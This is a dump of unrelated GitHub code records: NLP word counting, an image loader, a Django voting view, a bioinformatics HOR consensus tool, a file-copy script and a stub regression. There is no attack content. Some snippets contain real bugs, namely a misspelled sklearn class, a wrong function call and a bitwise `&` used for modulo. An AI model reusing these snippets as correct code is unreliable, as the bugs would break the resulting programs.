eventsToDataFrame(bucketData(sourceFiles, options.period))\n\n if options.windowedfile:\n windowFileName = options.output + '_windowed.csv'\n events.to_csv(windowFileName)\n \n if options.mousefile:\n mouseFileName = options.output + '_by_mouse.csv'\n byMouse = group_data_by_mouse(events)\n byMouse.to_csv(mouseFileName)\n \n if options.averagedfile:\n averagedFileName = options.output + '_averaged.csv'\n averaged = group_and_average_data(events)\n averaged.to_csv(averagedFileName)\n \n if options.graph != None:\n for behavior in options.graph:\n plot = makePlot(events, behavior)\n plotName = options.output + '_' + behavior + '_plot.png'\n plot.save(plotName)\n\n \n","repo_name":"deGravity/behaviortracker","sub_path":"behaviortracker/old_version.py","file_name":"old_version.py","file_ext":"py","file_size_in_byte":7501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"47117653314","text":"#This file serves to extract features from a case's paragraphs\n\nimport sys\nsys.path.append('/home/mia/Nextcloud/individual_project/nlp-legal/nlp_legal_code/code')\nimport pandas as pd \nimport nltk \nnltk.download('punkt')\nfrom nltk.tokenize import RegexpTokenizer\n#For compatibility issues see https://realpython.com/lessons/why-cant-python-find-my-modules/#description\n\n#Update this to the 
relevant data directory file using search and replace \nimport fetch_2021_data\n#import EDA.raw_text\n\ndef get_wordcount(text): \n tokenizer = RegexpTokenizer(r'\\w+')\n tokens = tokenizer.tokenize(text)\n wordcount = len(tokens)\n return wordcount\n\n\n'''Testing \ntext = \"The burglar said: Thjere wasn't a lot of $$ in the bag.!\"\ntokenizer = RegexpTokenizer(r'\\w+')\ntokens = tokenizer.tokenize(text)\nprint(tokens)\nprint(get_wordcount(text))\n'''\n\ndef get_wordcount_df():\n data= pd.read_csv('raw_text_df.csv', index_col=[0])\n #Alternatively\n #data = EDA.raw_text.get_df()\n\n data['base_case_txt'] = data['base_case_txt'].apply(get_wordcount)\n data['paragraph_txt'] = data['paragraph_txt'].apply(get_wordcount)\n data['decision_txt'] = data['decision_txt'].apply(get_wordcount)\n\n return data\n\n#Export to CSV\n#wordcount_df = get_wordcount_df()\n#wordcount_df.to_csv('word_counts.csv')\n\n#The following is a helper function for counting words of pre_token_df\n\ndef get_tokencount_df():\n data = pd.read_csv('pre_token_df_original.csv', index_col=[0])\n\n data['base_and_par_sent'] = data['base_and_par_sent'].apply(get_wordcount)\n data['decision_sent'] = data['decision_sent'].apply(get_wordcount)\n\n return data\n\n#The following is a helper function for linear_regression.py\ndef get_df(case_id):\n prep_df = fetch_2021_data.get_paragraph_df(case_id)\n\n #Extract simple features from paragraphs \n #Add paragraph text column \n\n prep_df['text'] = 'lorem ipsum'\n\n #Get paragraph directory\n paragraphs_path = fetch_2021_data.get_paragraph_directory_path(case_id)\n no_of_paragraphs = fetch_2021_data.get_number_of_paragraphs(case_id)\n\n #Enter raw text into text column of the df \n for i in range(1, no_of_paragraphs+1):\n #Get filename from df\n filename = prep_df.at[i, 'paragraphs']\n #Create path to file\n filepath = paragraphs_path.joinpath(filename)\n #Read text into df \n prep_df.at[i, 'text'] = filepath.read_text()\n\n\n #Tokenize text and remove stop words \n #https://www.mygreatlearning.com/blog/nltk-tutorial-with-python/\n\n tokens = nltk.word_tokenize(prep_df.at[1,'text'])\n\n from nltk.tokenize import RegexpTokenizer\n tokenizer = RegexpTokenizer(r'\\w+')\n\n #Create a new column with the word count per paragraph\n prep_df['word_count'] = 0\n\n #Enter the word count into the df\n for i in range(1, no_of_paragraphs+1):\n paragraph_text = prep_df.at[i,'text']\n paragraph_tokens = tokenizer.tokenize(paragraph_text)\n no_of_words = len(paragraph_tokens)\n prep_df.at[i, 'word_count'] = no_of_words\n\n #For linear regression, selecting only one independent variable (word_count)\n prep_df.drop(['text', 'paragraphs'], axis=1, inplace=True)\n\n prep_df = prep_df[['word_count', 'entails_decision']]\n\n return prep_df\n\n\n\n\n'''\n#Count the words in common between a paragraph and the base case\n#Base case\n\ndef get_words_in_common(case_id, paragraph_id):\n base_case = fetch_2021_data.get_base_case(case_id = '001')\n base_case_tokens = tokenizer.tokenize(base_case) \n \n words_in_common = []\n\n for i in base_case_tokens:\n for j in paragraph_tokens:\n if i==j:\n words_in_common.append(i)\n\n #Source https://datagy.io/python-remove-duplicates-from-list/#Use_Pandas_to_Remove_Duplicates_from_a_Python_List\n words_in_common = 
pd.Series(words_in_common).unique().tolist()\n'''\n\n\n\n\n\n\n","repo_name":"miahulla/ICL_2022_Individual_Project","sub_path":"Tools/wordcount.py","file_name":"wordcount.py","file_ext":"py","file_size_in_byte":3840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7552649202","text":"\"\"\"\nCarga de imágenes\n\"\"\"\nimport numpy as np\nimport cv2\nimport os\n\n\nclass CargadorSimpleDatos:\n def __init__(self, preprocesadores=None):\n self.preprocesadores = preprocesadores\n\n if self.preprocesadores is None:\n self.preprocesadores = []\n\n def cargar(self, rutas_imagenes, verboso=-1):\n datos = []\n etiquetas = []\n\n for i, ruta_imagen in enumerate(rutas_imagenes):\n # Cargar la imagen y extraer la etiqueta de clase asumiendo que\n # la ruta tiene el siguiente formato:\n # /ruta/hacia/imágenes/{clase}/{imagen}.algo\n imagen = cv2.imread(ruta_imagen)\n etiqueta = ruta_imagen.split(os.path.sep)[-2]\n\n # Pre-procesar\n for p in self.preprocesadores:\n imagen = p.preprocesar(imagen)\n\n # Se usará la imagen preprocesada como una \"vector de\n # características\", por lo que lo añadimos a la lista\n # correspondiente junto con su etiqueta correspondiente\n datos.append(imagen)\n etiquetas.append(etiqueta)\n\n # Si 'verboso' es mayor a cero, se puede usar para indicar mensajes\n # que indican el avance del procesamiento.\n # Se muestra el avance cada 'verboso' imágenes\n if verboso > 0 and i > 0 and (i + 1) & verboso == 0:\n print(\"[INFO] processed {}/{}\".format(i + 1, len(rutas_imagenes)))\n\n return (np.array(datos), np.array(etiquetas))\n","repo_name":"saulaxel/managerfias","sub_path":"image_processing/pyimagesearch/datasets/cargador_simple_datos.py","file_name":"cargador_simple_datos.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23759374645","text":"from functools import reduce\nimport json\n\nfrom phe import paillier\n\nfrom django.contrib import messages\nfrom django.db.models import Q\nfrom django.shortcuts import redirect\nfrom django.urls import reverse\nfrom django.utils.decorators import method_decorator\nfrom django.views import View\nfrom django.views.decorators.csrf import csrf_protect\n\nfrom core.decorators import login_required\nfrom core.models import (\n User, Candidate, Vote, VoterProfile\n)\n\n\n@method_decorator(csrf_protect, name='dispatch')\n@method_decorator(\n login_required(\n login_url='/',\n next='',\n redirect_field_name=None\n ),\n name='dispatch',\n)\nclass VoteProcessingView(View):\n \"\"\"\n View that processes votes.\n\n This subview may only process requests from users that are\n logged in and have not voted yet. Users that have voted already and\n anonymous users will be redirected to `/`.\n\n The data format for any POST requests is:\n {\n 'candidates_voted': [\n ,\n ,\n ...\n ]\n }\n\n Receiving invalid data from a user whom have not voted yet will cause the\n view to return an error message. 
If any data, valid or not, is received\n from a user who has voted already, a message will be returned saying that\n the user has voted already.\n\n View URL: `/vote`\n \"\"\"\n def get(self, request):\n return redirect(reverse('index'))\n\n def post(self, request):\n # Improve this.\n user = self.request.user\n has_user_voted = Vote.objects.filter(user__id=user.id).exists()\n try:\n # `candidates_voted` is expected to be a JSON-stringified array.\n candidates_voted = json.loads(request.POST['candidates_voted'])\n except KeyError:\n if has_user_voted:\n messages.error(\n request,\n 'You are no longer allowed to vote since you have voted '\n 'already. Additionally, the votes you were invalid too.'\n )\n else:\n messages.error(\n request,\n 'The votes you sent were invalid. Please try voting again,'\n ' and/or contact the system administrator.'\n )\n else:\n if has_user_voted:\n messages.error(\n request,\n 'You are no longer allowed to vote since you have voted '\n 'already.'\n )\n else:\n if type(candidates_voted) is list:\n try:\n self._cast_votes(user, candidates_voted)\n except ValueError:\n messages.error(\n request,\n 'The votes you sent were invalid. Please try '\n 'voting again, and/or contact the system '\n 'administrator.'\n )\n else:\n messages.error(\n request,\n 'The votes you sent were invalid. Please try voting '\n 'again, and/or contact the system administrator.'\n )\n\n return redirect(reverse('index'))\n\n def _cast_votes(self, user, candidates_voted):\n # Ensure that there are no duplicate candidates.\n election = user.voter_profile.batch.election\n encountered_candidate_ids = set()\n voted_candidates = list()\n num_selected_candidates_per_position = dict()\n for candidate_id in candidates_voted:\n try:\n candidate = Candidate.objects.get(id=candidate_id)\n except Candidate.DoesNotExist:\n raise ValueError('Voted candidate does not exist.')\n\n position = candidate.position\n\n # Check that there are no duplicate votes and that the candidate\n # IDs passed exist.\n if candidate_id not in encountered_candidate_ids:\n encountered_candidate_ids.add(candidate_id)\n \n candidate_election = candidate.election\n if election == candidate_election:\n pos_name = position.position_name\n if pos_name in num_selected_candidates_per_position:\n num_selected_candidates_per_position[pos_name] += 1\n\n pos_max_selected = position.max_num_selected_candidates\n pos_num_selected = (\n num_selected_candidates_per_position[pos_name]\n )\n if pos_num_selected > pos_max_selected: \n raise ValueError(\n 'Selected more candidates in the same '\n 'position than allowed.'\n )\n else:\n # No need to check if the number of selected candidates\n # in a position has already exceeded the set maximum\n # number, since the maximum number cannot be 0.\n num_selected_candidates_per_position[pos_name] = 1\n \n # Check if the voted candidated can be voted by the voter.\n batch = user.voter_profile.batch\n if (position.target_batches.exists()\n and batch not in position.target_batches.all()):\n raise ValueError(\n 'Voted for candidate whose position cannot be '\n 'voted by the voter.'\n )\n\n voted_candidates.append(candidate) \n else:\n raise ValueError(\n 'Voted for candidate in another election.'\n )\n else:\n raise ValueError('Duplicate candidates IDs submitted.')\n\n # Alright, things have gone well.\n for candidate in voted_candidates:\n Vote.objects.create(\n user=user,\n candidate=candidate,\n election=election\n )\n\n user.voter_profile.has_voted = True\n 
user.voter_profile.save()\n","repo_name":"seanballais/botos","sub_path":"core/views/vote.py","file_name":"vote.py","file_ext":"py","file_size_in_byte":6452,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"12848734651","text":"from Bio.Seq import Seq\nfrom Bio import SeqIO\nfrom Bio.SeqIO import FastaIO\nfrom Bio import SearchIO\nfrom Bio.SeqRecord import SeqRecord\n\nfrom Bio import AlignIO\n\nimport sys\nimport os\nfrom os import listdir\nfrom os.path import isfile, isdir, join\nimport argparse\nimport pandas as pd\nimport numpy as np\n\nimport subprocess\n\nimport edlib\nimport random\n\nimport HORmon.HORmon_pipeline.utils as utils\n\nMONOIDNT = 95\nINF=10000000\nsd_run = \"stringdecomposer\"\n\ndef load_fasta(filename, tp = \"list\"):\n if tp == \"map\":\n records = SeqIO.to_dict(SeqIO.parse(filename, \"fasta\"))\n for r in records:\n records[r] = records[r].upper()\n else:\n records = list(SeqIO.parse(filename, \"fasta\"))\n for i in range(len(records)):\n records[i] = records[i].upper()\n return records\n\ndef make_record(seq, name, sid, d=\"\"):\n return SeqRecord(seq, id=sid, name=name, description = d)\n\ndef save_fasta(filename, orfs):\n with open(filename, \"w\") as output_handle:\n SeqIO.write(orfs, output_handle, \"fasta\")\n #fasta_out = FastaIO.FastaWriter(output_handle, wrap=None)\n #fasta_out.write_file(orfs)\n\ndef load_monodec(cen):\n dec = []\n monomers = set()\n filename = os.path.join(PATH, \"cen\" + cen + \"_dec.tsv\")\n with open(filename, \"r\") as fin:\n for ln in fin.readlines():\n if len(ln.strip().split(\"\\t\")) < 5:\n continue\n ref, mon, start, end, idnt = ln.strip().split(\"\\t\")[:5]\n dec.append([ref, mon, start, end, idnt])\n monomers.add(mon)\n #dec = revert_rcreads(dec)\n #dec = remove_badreads(dec)\n return dec, monomers\n\ndef load_bedfile(bedfile):\n dec = []\n monomers = set()\n with open(bedfile, \"r\") as fin:\n for ln in fin.readlines():\n if len(ln.strip().split(\"\\t\")) < 6:\n continue\n ref, start, end, mon, idnt, rev = ln.strip().split(\"\\t\")[:6]\n dec.append([ref, mon, start, end, idnt, rev])\n monomers.add(mon)\n return dec, monomers\n\ndef shift(hor_lst):\n min_ind = 0\n for i in range(len(hor_lst)):\n if hor_lst[min_ind] > hor_lst[i]:\n min_ind = i\n break\n return hor_lst[min_ind:] + hor_lst[:min_ind]\n\ndef load_horascycle(filename, log=None):\n if log is not None:\n log.info(\"\\n= Loading HORs cycles =\", indent=1)\n hors = []\n hor_name= \"\"\n mono_mp = {}\n cnt, hor_cnt = 0, 0\n with open(filename, \"r\") as fin:\n for ln in fin.readlines():\n if len(ln.split(\"\\t\")) < 2:\n continue\n hor_name, hor_seq = ln.strip().split(\"\\t\")[:2]\n hor_lst = hor_seq.split(\",\")[:-1]\n #hor_lst = shift(hor_lst)\n if log is None:\n print(hor_lst)\n else:\n log.info(\"Loaded HOR: \" + str(hor_lst), indent=2)\n hors.append([hor_name, hor_lst])\n return hors\n\n\ndef run_clustal(mappings, clustal_dir, pair_name):\n from Bio.Align.Applications import ClustalwCommandline\n from Bio.Align.Applications import ClustalOmegaCommandline\n from Bio import AlignIO\n from Bio.Align import AlignInfo\n from Bio.Align import MultipleSeqAlignment\n\n cluster_seqs_path = os.path.join(clustal_dir, pair_name + \"_seq.fasta\")\n aln_file = os.path.join(clustal_dir, pair_name + \"_seq.clu\")\n if not os.path.isdir(clustal_dir):\n os.makedirs(clustal_dir)\n if len(mappings) == 1:\n save_fasta(cluster_seqs_path, mappings + mappings)\n else:\n save_fasta(cluster_seqs_path, mappings)\n\n cmd = 
ClustalOmegaCommandline(infile=cluster_seqs_path, outfile=aln_file, force=True, threads=10)\n stdout, stderr = cmd()\n align = AlignIO.read(aln_file, \"fasta\")\n\n summary_align = AlignInfo.SummaryInfo(align)\n consensus = summary_align.gap_consensus(threshold=0, ambiguous='N')\n consensus = str(consensus).replace('-', '')\n return consensus\n\ndef extract_consensus(total_alns):\n consensus = \"\"\n scores = []\n for i in range(len(total_alns[0])):\n score = {\"A\": 0, \"C\": 0, \"G\": 0, \"T\": 0, \"-\": 0}\n for j in range(len(total_alns)):\n score[total_alns[j][i]] += 1\n scores_lst = sorted([[it, score[it]] for it in score ], key = lambda x: -x[1])\n scores.append(scores_lst)\n max_score = scores_lst[0][0]\n if scores_lst[0][1] == scores_lst[1][1]:\n max_score = \"N\"\n if max_score != \"-\":\n consensus += max_score\n return consensus, scores\n\ndef align_mappings(mappings, clustal_dir, pair_name):\n pair_name = pair_name.replace(\"/\", \"_\")\n pair_name = pair_name.replace(\"(\", \"_\")\n pair_name = pair_name.replace(\")\", \"_\")\n pair_name = pair_name.replace(\".\", \"_\")\n pair_name = pair_name.replace(\"&\", \"_\")\n consensus = run_clustal(mappings, clustal_dir, pair_name)\n return consensus\n\ndef edist(lst):\n if len(str(lst[0])) == 0:\n return INF, []\n if len(str(lst[1])) == 0:\n return INF, []\n result = edlib.align(str(lst[0]), str(lst[1]), mode=\"SHW\", task=\"path\", k=100)\n if result[\"editDistance\"] == -1:\n return INF, []\n aln = edlib.getNiceAlignment(result, str(lst[0]), str(lst[1]))\n return result[\"editDistance\"], aln\n\ndef glue_pairs(p1, p2, log=None):\n max_len = 200\n eds = []\n ed, aln = edist([p1[-max_len:], p2])\n longest, longest_ind = 0, -1\n cur_len = 0\n for i in range(len(aln[\"matched_aligned\"])):\n if aln[\"matched_aligned\"][i] == \"|\":\n cur_len += 1\n else:\n if cur_len > longest:\n longest, longest_ind = cur_len, i - cur_len\n cur_len = 0\n if cur_len > longest:\n longest, longest_ind = cur_len, len(aln[\"matched_aligned\"]) - cur_len\n i, j = len(p1) - max_len + len(aln[\"query_aligned\"][:longest_ind].replace(\"-\", \"\")), len(aln[\"target_aligned\"][:longest_ind].replace(\"-\", \"\"))\n\n if log is None:\n print(i, j, ed, len(p1[:i] + p2[j:]))\n print(\"\")\n else:\n log.info(\"i=\" + str(i) + \"; j=\" + str(j) +\"; edit dist=\" + str(ed) + \"; pair union len=\" + str(len(p1[:i] + p2[j:])), indent=3)\n return i, j\n\ndef build_monoconsensus(monodec, ref, step, clustal_dir, log=None):\n mappings = {}\n for i in range(len(monodec)):\n m_name, m_s, m_e, m_idnt = monodec[i][1], int(monodec[i][2]), int(monodec[i][3]), float(monodec[i][4])\n if m_idnt > MONOIDNT:\n if m_name not in mappings:\n mappings[m_name] = []\n if monodec[i][5] == \"+\":\n mappings[m_name].append(make_record(ref[monodec[i][0]].seq[max(0, m_s - step): min(m_e + step, len(ref[monodec[i][0]].seq) )], m_name + str(m_s), m_name + str(m_s)))\n else:\n mappings[m_name].append(make_record(ref[monodec[i][0]].seq[max(0, m_s - step): min(m_e + step, len(ref[monodec[i][0]].seq) )].reverse_complement(), m_name + str(m_s) + \"_rev\", m_name + str(m_s) + \"_rev\"))\n m_consensus = []\n for m in mappings:\n if log != None:\n log.info(\"Detecting monoconsensus for \" + m, indent=1)\n else:\n print(m)\n consensus = align_mappings(mappings[m], clustal_dir, m)\n consensus = consensus[step : len(consensus)-step]\n cur_consensus = make_record(Seq(consensus), m, m)\n m_consensus.append(cur_consensus)\n return m_consensus\n\ndef build_pairconsensus(hors, monodec, ref, clustal_dir, 
log=None):\n if log is not None:\n log.info(\"\\n= Build Pair Consensus =\", indent=1)\n\n hors_seq = []\n for hor_desc in hors:\n hor = hor_desc[1]\n pairs_consensus = []\n for i in range(len(hor)):\n m1, m2 = hor[i], hor[(i+1)%len(hor)]\n mappings = []\n for j in range(len(monodec)-1):\n if ((monodec[j][1] == m1 and monodec[j+1][1] == m2 and monodec[j][5] == monodec[j+1][5] == \"+\") or\\\n (monodec[j][1] == m2 and monodec[j+1][1] == m1 and monodec[j][5] == monodec[j+1][5] == \"-\")) \\\n and float(monodec[j][4]) > MONOIDNT and float(monodec[j+1][4]) > MONOIDNT:\n s1, e1, s2, e2 = int(monodec[j][2]), int(monodec[j][3]), int(monodec[j+1][2]), int(monodec[j+1][3])\n if s2 - e1 < 10:\n if monodec[j][5] == \"+\":\n mappings.append(make_record(ref[monodec[j][0]].seq[s1: e2], m1+\"_\" + m2 + str(s1), m1 + \"_\" +m2 + str(s1) ))\n else:\n mappings.append(make_record(ref[monodec[j][0]].seq[s1: e2].reverse_complement(), m1+\"_\" + m2 + str(s1) + \"_rev\", m1 + \"_\" +m2 + str(s1) + \"_rev\" ))\n\n if log is None:\n print(\"pair: \", m1, m2, len(mappings))\n else:\n log.info(\"# pairs(\" + m1 + \", \" + m2 + \") = \" + str(len(mappings)), indent=2)\n\n if len(mappings) > 0:\n pairs_consensus.append(align_mappings(mappings, clustal_dir, m1+\"_\" + m2))\n\n if len(pairs_consensus) > 0:\n cur_consensus = \"\"\n border = []\n for i in range(len(pairs_consensus)):\n if log is None:\n print(\"Pair \", i)\n else:\n log.info(\"Handle pair #\" + str(i), indent=2)\n border.append(glue_pairs(pairs_consensus[i], pairs_consensus[(i+1)%len(pairs_consensus)], log))\n\n l, r = border[len(pairs_consensus)-1][1], 0\n for i in range(len(pairs_consensus)):\n r = border[i][0]\n if l > r:\n if log is None:\n print(\"Something went wrong!\", i, l, r)\n exit(-1)\n else:\n log.error(\"Something went wrong! 
\" + str(i) + \" \" + str(l) + \" \" + str(r))\n\n cur_consensus += pairs_consensus[i][l: r]\n l = border[i][1]\n\n if log is None:\n print(len(cur_consensus))\n else:\n log.info(\"\\n\")\n log.info(\"HOR consensus len=\" + str(len(cur_consensus)), indent=2)\n\n hors_seq.append(make_record(Seq(cur_consensus), hor_desc[0], hor_desc[0], str(len(cur_consensus)) + \"bp \" + \",\".join(hor) ))\n else:\n hors_seq.append(make_record(Seq(\"\"), hor_desc[0], hor_desc[0], str(0) + \"bp \" + \",\".join(hor) ))\n return hors_seq\n\n\ndef run(sequences, monomers, num_threads, out_file, log=None):\n if log is not None:\n log.info(\"Run StringDecomposer\", indent=2)\n utils.sys_call([sd_run, sequences, monomers, \"-t\", str(num_threads), \"--out-file\", out_file])\n with open(out_file + \".tsv\", 'r') as f:\n out_decomposition = \"\".join(f.readlines())\n return out_decomposition\n\n\ndef divide_into_monomers(hors_lst, hors, monomers, horfile, monofile, outtsv, log=None):\n if log is not None:\n log.info(\"\\n= Divide into monomers =\", indent=1)\n hors_res, res, bed = [], [], []\n for i in range(len(hors)):\n h, start_mono, hor_len = hors[i], hors_lst[i][1][0], len(hors_lst[i][1])\n if len(h.seq) > 0:\n triple_hors = []\n triple_hors.append(make_record(h.seq + h.seq + h.seq, h.id, h.name, h.description))\n save_fasta(horfile, triple_hors)\n decomposition = run(horfile, monofile, \"1\", outtsv[:-len(\".tsv\")], log)\n inHOR, start_shift = False, 0\n newhor_seq = Seq(\"\")\n\n if log is None:\n print(start_mono, hor_len, len(h.seq))\n else:\n log.info(\"Start monomer=\" + str(start_mono) + \", HOR len(#mon)=\" + str(hor_len) + \", HOR len(bp)=\" + str(len(h.seq)), indent=2)\n\n mono_num = 0\n for ln in decomposition.split(\"\\n\")[1:-1]:\n ref, mono, start, end, score = ln.split(\"\\t\")[:5]\n if mono == start_mono:\n inHOR, start_shift = True, int(start)\n if log is None:\n print(\"shift\", start_shift)\n else:\n log.info(\"Start monomer shift=\" + str(start_shift), indent=2)\n\n if inHOR and mono_num < hor_len:\n if log is None:\n print(mono, ref + \":\" + str(int(start) - start_shift) + \"-\" + str(int(end) + 1 - start_shift), len(res) )\n else:\n log.info(\"Monomer# \" + str(len(res)) + \": \" + mono + \" \" + ref + \":\" + str(int(start) - start_shift) + \"-\" + str(int(end) + 1 - start_shift), indent=2)\n mono_num += 1\n res.append(make_record(triple_hors[0].seq[int(start): int(end) + 1], mono, mono, ref + \":\" + str(int(start) - start_shift) + \"-\" + str(int(end) + 1 - start_shift) ))\n r, g, b = random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)\n bed.append(\"\\t\".join([ref, str(int(start) - start_shift), str(int(end) + 1 - start_shift), mono, str(int(float(score))), \"+\", str(int(start) - start_shift), str(int(end) + 1 - start_shift), \",\".join([str(r), str(g), str(b)]) ]))\n newhor_seq += triple_hors[0].seq[int(start): int(end) + 1]\n\n hors_res.append(make_record(newhor_seq, h.id, h.id, str(len(newhor_seq)) + \"bp \" + \",\".join(hors_lst[i][1]) ))\n return hors_res, res, bed\n\n\ndef getHORconsensus(hors_tsv, monodec, ref, consensus, mono_outfilename, outdir, log=None):\n hors = load_horascycle(hors_tsv, log)\n hor_consensus = build_pairconsensus(hors, monodec, ref, os.path.join(outdir, \"clustal_alns\"), log=log)\n\n if len(hor_consensus) > 0:\n hor_outfilename = os.path.join(outdir, \"hor_consensus.fasta\")\n hor_consensus_shifted, pair_monomers, bed = divide_into_monomers(hors, hor_consensus, consensus,\n hor_outfilename, mono_outfilename,\n os.path.join(outdir, 
\"sd.tsv\"), log)\n hor_outfilename = os.path.join(outdir, \"hor_consensus.fasta\")\n save_fasta(hor_outfilename, hor_consensus_shifted)\n\n if log is not None:\n log.info(\"HOR consensus can be found\" + hor_outfilename, indent=1)\n else:\n print(\"HOR consensus can be found\", hor_outfilename)\n\n pmono_outfilename = os.path.join(outdir, \"monomer_paired_consensus.fasta\")\n save_fasta(pmono_outfilename, pair_monomers)\n\n if log is not None:\n log.info(\"Paired monomer consensus can be found \" + pmono_outfilename, indent=1)\n else:\n print(\"Paired monomer consensus can be found\", pmono_outfilename)\n\n\n outfilename = os.path.join(outdir, \"monomer_paired_consensus.bed\")\n with open(outfilename, \"w\") as fout:\n for ln in bed:\n fout.write(ln + \"\\n\")\n\n if log is not None:\n log.info(\"Paired monomer consensus bed can be found \" + outfilename, indent=1)\n else:\n print(\"Paired monomer consensus bed can be found\", outfilename)\n else:\n print(\"Paired wasn't generated - no pairs found\")\n\n\ndef build_horcons(sepath, bedfile, odir, horspath, extend=4, seed=123, log=None):\n random.seed(int(seed))\n ref = load_fasta(sepath, \"map\")\n\n if not os.path.exists(odir):\n os.makedirs(odir)\n\n mono_outfilename = os.path.join(odir, \"monomer_consensus.fasta\")\n monodec, monomers = load_bedfile(bedfile)\n consensus = build_monoconsensus(monodec, ref, int(extend), os.path.join(odir, \"clustal_alns\"), log=log)\n save_fasta(mono_outfilename, consensus)\n\n if log is not None:\n log.info(\"\\nMonomer consensus can be found \" + mono_outfilename, indent=1)\n else:\n print(\"Monomer consensus can be found \", mono_outfilename)\n\n if horspath != None:\n getHORconsensus(horspath, monodec, ref, consensus, mono_outfilename, odir, log=log)\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Extracts monomer/HOR consensus from annotation')\n parser.add_argument('sequences', help='fasta-file with annotated sequences')\n parser.add_argument('annotation', help='bed-file with annotation')\n parser.add_argument('outdir', help='output directory')\n parser.add_argument('--hors', help='tsv-file with HOR description', required=False)\n parser.add_argument('--extend', help='number of bp to extend monomer alignment', default=4, required=False)\n parser.add_argument('--seed', help='seed for colors generation in bed-files', default=123, required=False)\n args = parser.parse_args()\n\n build_horcons(args.sequences, args.annotation, args.outdir, args.hors, args.extend, args.seed)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ablab/HORmon","sub_path":"HORmon/build_horconsensus.py","file_name":"build_horconsensus.py","file_ext":"py","file_size_in_byte":16651,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"28628382076","text":"from multiprocessing.dummy import Pool\r\nimport os\r\nimport shutil\r\nimport argparse\r\n\r\nargParser = argparse.ArgumentParser()\r\nargParser.add_argument(\"-s\", \"--src\", help=\"root path to copy from\", required=True)\r\nargParser.add_argument(\"-d\", \"--dst\", help=\"root path to copy to\", required=True)\r\nargParser.add_argument(\"-t\", \"--threads\", help=\"number of parallel threads\", default=4, type=int)\r\n\r\n\r\ndef copy_or_down(src, dst):\r\n if not os.path.exists(dst):\r\n if os.path.isdir(src):\r\n try:\r\n shutil.copytree(src, dst)\r\n except Exception as e:\r\n print(f'failed to copy tree: {e}')\r\n else:\r\n try:\r\n if os.path.isfile(src):\r\n shutil.copy(src, dst)\r\n 
except Exception as e:\r\n print(f'failed to copy file: {e}')\r\n else:\r\n if os.path.isdir(src):\r\n for child in os.listdir(src):\r\n copy_or_down(os.path.join(src, child), os.path.join(dst, child))\r\n\r\n\r\ndef try_multiple_threads(src, dst, fldrs):\r\n for fldr in fldrs:\r\n copy_or_down(os.path.join(src, fldr), os.path.join(dst, fldr))\r\n\r\n\r\ndef main():\r\n args = argParser.parse_args()\r\n\r\n if not os.path.exists(args.src):\r\n raise FileNotFoundError(f'cannot find src path {args.src}')\r\n\r\n if not os.path.exists(args.dst):\r\n raise FileNotFoundError(f'cannot find dst path {args.dst}')\r\n\r\n fldrs = os.listdir(args.src)\r\n\r\n if args.threads == 1:\r\n try_multiple_threads(args, fldrs)\r\n else:\r\n with Pool(args.threads) as p:\r\n p.starmap(try_multiple_threads, [(args.src, args.dst, fldr) for fldr in fldrs])\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"Bonsa11/overseer_mover","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40827093607","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 22 20:15:32 2016\n\n@author: wang_wei52\n\"\"\"\n\n\nimport pandas as pd\nfrom sklearn import linear_model\n\n\ndef get_data(filename):\n data = pd.read_csv(filename)\n x_parameter = []\n y_parameter = []\n for single_square_feet, single_price_value in zip(data['square_feet'], data['price']):\n x_parameter.append([float(single_square_feet)])\n y_parameter.append(float(single_price_value))\n return x_parameter, y_parameter\n\n\ndef linear_model_main(x_parameters, y_parameters):\n # create linear regression object\n regression = linear_model.linearRegression()\n regression.fit(x_parameters, y_parameters)\n\n","repo_name":"Jamesmarswang/Python","sub_path":"MLDemo/StudyDemo/predict_hourse_price.py","file_name":"predict_hourse_price.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27968648820","text":"# -*- coding: utf-8 -*-\n\"\"\"\nProvides entry point main(argv) when running from the command line.\n\nCreated on Sat Jul 9 12:45:39 2016\n\n@author: Aaron Beckett\n\"\"\"\n\nimport os\nimport argparse\n\nimport ctip.commands as cmd\n\n# Version information (parsed by setup.py\n__version__ = \"0.1.1\"\n\n# Get help text from file in docs folder\nwith open(\"docs\" + os.path.sep + \"help_message.txt\") as f:\n help_text = f.read()\n\n\ndef main(argv):\n\n # If the user just runs 'ctip' then print the help message\n if (len(argv) == 1):\n print(help_text)\n exit(0)\n\n # Create the command line parser\n parser = create_cli_parser()\n\n # Parse the command line arguments with the parser\n args = parser.parse_args(argv[1:])\n\n # Call the correct function\n args.func(args)\n\n\ndef create_cli_parser():\n \"\"\"Create CTIP ArgumentParser.\"\"\"\n parser = argparse.ArgumentParser()\n\n subparsers = parser.add_subparsers()\n parser_run = subparsers.add_parser('run')\n parser_check = subparsers.add_parser('check')\n parser_stop = subparsers.add_parser('stop')\n parser_clean = subparsers.add_parser('clean')\n parser_set = subparsers.add_parser('set')\n parser_env = subparsers.add_parser('env')\n parser_tables = subparsers.add_parser('tables')\n parser_list = subparsers.add_parser('list')\n parser_update = subparsers.add_parser('update')\n parser_log = subparsers.add_parser('log')\n\n # run\n 
